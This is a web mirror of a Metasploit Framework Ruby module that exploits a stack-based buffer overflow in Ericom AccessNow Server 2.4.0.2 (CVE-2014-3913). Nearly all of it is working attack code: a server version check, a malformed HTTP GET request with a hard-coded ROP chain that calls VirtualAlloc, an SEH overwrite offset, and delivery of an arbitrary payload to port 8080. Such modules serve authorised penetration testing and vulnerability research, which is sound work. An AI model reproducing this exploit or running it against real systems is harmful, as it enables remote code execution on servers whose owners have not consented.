Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/ericom_access_now_bof.rb
19591 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Ericom AccessNow Server Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack based buffer overflow in Ericom AccessNow Server. The

18
          vulnerability is due to an insecure usage of vsprintf with user controlled data,

19
          which can be triggered with a malformed HTTP request. This module has been tested

20
          successfully with Ericom AccessNow Server 2.4.0.2 on Windows XP SP3 and Windows 2003

21
          Server SP2.

22
        },

23
        'Author' => [

24
          'Unknown', # Vulnerability Discovery

25
          'juan vazquez', # Metasploit Module

26
        ],

27
        'References' => [

28
          ['ZDI', '14-160'],

29
          ['CVE', '2014-3913'],

30
          ['BID', '67777'],

31
          ['URL', 'http://www.ericom.com/security-ERM-2014-610.asp']

32
        ],

33
        'Privileged' => true,

34
        'Platform' => 'win',

35
        'Arch' => ARCH_X86,

36
        'Payload' => {

37
          'Space' => 4096,

38
          'BadChars' => "\x00\x0d\x0a",

39
          'DisableNops' => true,

40
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500

41
        },

42
        'Targets' => [

43
          [

44
            'Ericom AccessNow Server 2.4.0.2 / Windows [XP SP3 / 2003 SP2]',

45
            {

46
              'RopOffset' => 62,

47
              'Offset' => 30668,

48
              'Ret' => 0x104da1e5 # 0x104da1e5 {pivot 1200 / 0x4b0} # ADD ESP,4B0 # RETN # From AccessNowAccelerator32.dll

49
            }

50
          ]

51
        ],

52
        'DisclosureDate' => '2014-06-02',

53
        'DefaultTarget' => 0,

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61


62
    register_options([Opt::RPORT(8080)])

63
  end

64


65
  def check

66
    res = send_request_cgi({

67
      'uri' => '/AccessNow/start.html'

68
    })

69


70
    unless res && res.code == 200 && res.headers['Server']

71
      return Exploit::CheckCode::Safe

72
    end

73


74
    if res.headers['Server'] =~ /Ericom AccessNow Server/

75
      return Exploit::CheckCode::Appears # Ericom AccessNow 2.4

76
    elsif res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /Ericom Access Server/

77
      return Exploit::CheckCode::Detected # Ericom AccessNow 3

78
    end

79


80
    Exploit::CheckCode::Unknown

81
  end

82


83
  def exploit_uri

84
    uri = "#{rand_text_alpha(1)} " # To ensure a "malformed request" error message

85
    uri << rand_text(target['RopOffset'])

86
    uri << create_rop_chain

87
    uri << payload.encoded

88
    uri << rand_text(target['Offset'] - uri.length)

89
    uri << rand_text(4) # nseh

90
    uri << [target.ret].pack("V") # seh

91


92
    uri

93
  end

94


95
  def exploit

96
    print_status("Sending malformed request...")

97
    send_request_raw({

98
      'method' => 'GET',

99
      'uri' => exploit_uri,

100
      'encode' => false

101
    }, 1)

102
  end

103


104
  def create_rop_chain

105
    # rop chain generated with mona.py - www.corelan.be

106
    rop_gadgets =

107
      [

108
        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3

109
        0x10518867, # RETN # [AccessNowAccelerator32.dll] # Padding to ensure it works in both windows 2003 SP2 and XP SP3

110
        0x10518866, # POP EAX # RETN [AccessNowAccelerator32.dll]

111
        0x105c6294, # ptr to &VirtualAlloc() [IAT AccessNowAccelerator32.dll]

112
        0x101f292b, # MOV EAX,DWORD PTR DS:[EAX] # RETN [AccessNowAccelerator32.dll]

113
        0x101017e6, # XCHG EAX,ESI # RETN [AccessNowAccelerator32.dll]

114
        0x103ba89c, # POP EBP # RETN [AccessNowAccelerator32.dll]

115
        0x103eed74, # & jmp esp [AccessNowAccelerator32.dll]

116
        0x1055dac2, # POP EAX # RETN [AccessNowAccelerator32.dll]

117
        0xffffffff, # Value to negate, will become 0x00000001

118
        0x1052f511, # NEG EAX # RETN [AccessNowAccelerator32.dll]

119
        0x10065f69, # XCHG EAX,EBX # RETN [AccessNowAccelerator32.dll]

120
        0x10074429, # POP EAX # RETN [AccessNowAccelerator32.dll]

121
        0xfbdbcb75, # put delta into eax (-> put 0x00001000 into edx)

122
        0x10541810, # ADD EAX,424448B # RETN [AccessNowAccelerator32.dll]

123
        0x1038e58a, # XCHG EAX,EDX # RETN [AccessNowAccelerator32.dll]

124
        0x1055d604, # POP EAX # RETN [AccessNowAccelerator32.dll]

125
        0xffffffc0, # Value to negate, will become 0x00000040

126
        0x10528db3, # NEG EAX # RETN [AccessNowAccelerator32.dll]

127
        0x1057555d, # XCHG EAX,ECX # RETN [AccessNowAccelerator32.dll]

128
        0x1045fd24, # POP EDI # RETN [AccessNowAccelerator32.dll]

129
        0x10374022, # RETN (ROP NOP) [AccessNowAccelerator32.dll]

130
        0x101f25d4, # POP EAX # RETN [AccessNowAccelerator32.dll]

131
        0x90909090, # nop

132
        0x1052cfce  # PUSHAD # RETN [AccessNowAccelerator32.dll]

133
      ].pack("V*")

134


135
    rop_gadgets

136
  end

137
end

138


139